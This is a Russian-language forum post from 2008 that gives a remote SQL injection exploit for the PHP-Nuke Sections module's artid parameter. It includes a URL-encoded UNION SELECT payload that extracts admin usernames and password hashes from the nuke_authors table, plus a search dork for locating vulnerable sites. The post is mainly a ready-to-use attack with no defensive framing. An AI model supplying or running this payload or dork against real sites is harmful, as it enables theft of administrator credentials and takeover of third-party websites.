19.02.2008, 21:52
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
PHP-Nuke Module Sections (artid) Remote SQL Injection
SQL Injection
Код:
Пример:
www.xxX/xxxxSections&op=viewarticle&artid=(exploit)
Код:
9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2
Для поиска сайтов с этим модулем:
Код:
allinurl: "имя секции"
(c)
|
|
|